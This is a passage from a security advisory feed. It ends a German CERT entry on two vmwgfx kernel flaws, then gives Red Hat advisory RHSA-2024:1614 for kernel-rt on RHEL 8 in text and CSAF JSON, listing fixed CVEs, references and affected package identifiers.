"notes": [
{
"category": "description",
"text": "Im Linux Kernel existieren mehrere Schwachstellen. Die Fehler bestehen aufgrund eines Integer-\u00dcberlaufs und einer NULL-Zeiger-Dereferenz im vmwgfx-Treiber. Ein lokaler Angreifer kann diese Schwachstellen ausnutzen, um einen \u0027Denial of Service\u0027-Zustand zu verursachen. Die erfolgreiche Ausnutzung dieser Schwachstellen erfordert den Zugriff auf /dev/dri/card0 oder /dev/dri/rendererD128."
}
],
"product_status": {
"known_affected": [
"T032377",
"T032378",
"2951",
"T002207",
"67646",
"6368",
"T000126",
"T036379",
"T015895",
"T004914",
"T032255"
]
},
"release_date": "2022-10-10T22:00:00.000+00:00",
"title": "CVE-2022-36402"
},
{
"cve": "CVE-2022-38096",
"notes": [
{
"category": "description",
"text": "Im Linux Kernel existieren mehrere Schwachstellen. Die Fehler bestehen aufgrund eines Integer-\u00dcberlaufs und einer NULL-Zeiger-Dereferenz im vmwgfx-Treiber. Ein lokaler Angreifer kann diese Schwachstellen ausnutzen, um einen \u0027Denial of Service\u0027-Zustand zu verursachen. Die erfolgreiche Ausnutzung dieser Schwachstellen erfordert den Zugriff auf /dev/dri/card0 oder /dev/dri/rendererD128."
}
],
"product_status": {
"known_affected": [
"T032377",
"T032378",
"2951",
"T002207",
"67646",
"6368",
"T000126",
"T036379",
"T015895",
"T004914",
"T032255"
]
},
"release_date": "2022-10-10T22:00:00.000+00:00",
"title": "CVE-2022-38096"
}
]
}
rhsa-2024_1614
Vulnerability from csaf_redhat
Published
2024-04-02 17:26
Modified
2024-11-15 17:47
Summary
Red Hat Security Advisory: kernel-rt security and bug fix update
Notes
Topic
An update for kernel-rt is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Security Fix(es):
* kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query (CVE-2022-38096)
* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (CVE-2023-6931)
* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546,ZDI-CAN-20527)
* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (CVE-2024-0565)
* kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (CVE-2023-51042)
* kernel: ext4: kernel bug in ext4_write_inline_data_end() (CVE-2021-33631)
* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)
Bug Fix(es):
* kernel-rt: update RT source tree to the latest RHEL-8.9.z3 Batch (JIRA:RHEL-23853)
* kernel-rt: kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (JIRA:RHEL-24015)
* kernel-rt: kernel: vmxgfx: NULL pointer dereference in vmw_cmd_dx_define_query (JIRA:RHEL-22758)
* kernel-rt: kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (JIRA:RHEL-22080)
* kernel-rt: kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (JIRA:RHEL-22933)
* kernel-rt: kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (JIRA:RHEL-24498)
* kernel-rt: kernel: GSM multiplexing race condition leads to privilege escalation (JIRA:RHEL-19966)
* kernel-rt: kernel: ext4: kernel bug in ext4_write_inline_data_end() (JIRA:RHEL-26334)
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for kernel-rt is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query (CVE-2022-38096)\n\n* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event\u0027s read_size (CVE-2023-6931)\n\n* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546,ZDI-CAN-20527)\n\n* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (CVE-2024-0565)\n\n* kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (CVE-2023-51042)\n\n* kernel: ext4: kernel bug in ext4_write_inline_data_end() (CVE-2021-33631)\n\n* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)\n\nBug Fix(es):\n\n* kernel-rt: update RT source tree to the latest RHEL-8.9.z3 Batch (JIRA:RHEL-23853)\n\n* kernel-rt: kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (JIRA:RHEL-24015)\n\n* kernel-rt: kernel: vmxgfx: NULL pointer dereference in vmw_cmd_dx_define_query (JIRA:RHEL-22758)\n\n* kernel-rt: kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (JIRA:RHEL-22080)\n\n* kernel-rt: kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event\u0027s read_size (JIRA:RHEL-22933)\n\n* kernel-rt: kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (JIRA:RHEL-24498)\n\n* kernel-rt: kernel: GSM multiplexing race condition leads to privilege escalation (JIRA:RHEL-19966)\n\n* kernel-rt: kernel: ext4: kernel bug in ext4_write_inline_data_end() (JIRA:RHEL-26334)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:1614",
"url": "https://access.redhat.com/errata/RHSA-2024:1614"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2133452",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133452"
},
{
"category": "external",
"summary": "2252731",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2252731"
},
{
"category": "external",
"summary": "2255498",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255498"
},
{
"category": "external",
"summary": "2258518",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258518"
},
{
"category": "external",
"summary": "2259866",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259866"
},
{
"category": "external",
"summary": "2261976",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2261976"
},
{
"category": "external",
"summary": "2262126",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262126"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_1614.json"
}
],
"title": "Red Hat Security Advisory: kernel-rt security and bug fix update",
"tracking": {
"current_release_date": "2024-11-15T17:47:13+00:00",
"generator": {
"date": "2024-11-15T17:47:13+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.1"
}
},
"id": "RHSA-2024:1614",
"initial_release_date": "2024-04-02T17:26:48+00:00",
"revision_history": [
{
"date": "2024-04-02T17:26:48+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-04-02T17:26:48+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-15T17:47:13+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product": {
"name": "Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:8::nfv"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux for Real Time (v. 8)",
"product": {
"name": "Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:8::realtime"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"product": {
"name": "kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"product_id": "kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt@4.18.0-513.24.1.rt7.326.el8_9?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product": {
"name": "kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_id": "kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt@4.18.0-513.24.1.rt7.326.el8_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product": {
"name": "kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_id": "kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-core@4.18.0-513.24.1.rt7.326.el8_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product": {
"name": "kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_id": "kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug@4.18.0-513.24.1.rt7.326.el8_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product": {
"name": "kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_id": "kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-core@4.18.0-513.24.1.rt7.326.el8_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product": {
"name": "kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_id": "kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-devel@4.18.0-513.24.1.rt7.326.el8_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product": {
"name": "kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_id": "kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-kvm@4.18.0-513.24.1.rt7.326.el8_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product": {
"name": "kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_id": "kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules@4.18.0-513.24.1.rt7.326.el8_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product": {
"name": "kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_id": "kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-extra@4.18.0-513.24.1.rt7.326.el8_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product": {
"name": "kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_id": "kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-devel@4.18.0-513.24.1.rt7.326.el8_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product": {
"name": "kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_id": "kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-kvm@4.18.0-513.24.1.rt7.326.el8_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product": {
"name": "kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_id": "kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules@4.18.0-513.24.1.rt7.326.el8_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product": {
"name": "kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_id": "kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-extra@4.18.0-513.24.1.rt7.326.el8_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product": {
"name": "kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_id": "kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-debuginfo@4.18.0-513.24.1.rt7.326.el8_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product": {
"name": "kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_id": "kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debuginfo@4.18.0-513.24.1.rt7.326.el8_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product": {
"name": "kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_id": "kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debuginfo-common-x86_64@4.18.0-513.24.1.rt7.326.el8_9?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src as a component of Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src"
},
"product_reference": "kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"relates_to_product_reference": "NFV-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "NFV-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "NFV-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "NFV-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "NFV-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "NFV-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "NFV-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "NFV-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "NFV-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "NFV-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "NFV-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "NFV-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "NFV-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "NFV-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "NFV-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 8)",
"product_id": "NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "NFV-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src as a component of Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src"
},
"product_reference": "kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"relates_to_product_reference": "RT-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "RT-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "RT-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "RT-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "RT-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "RT-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "RT-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "RT-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "RT-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
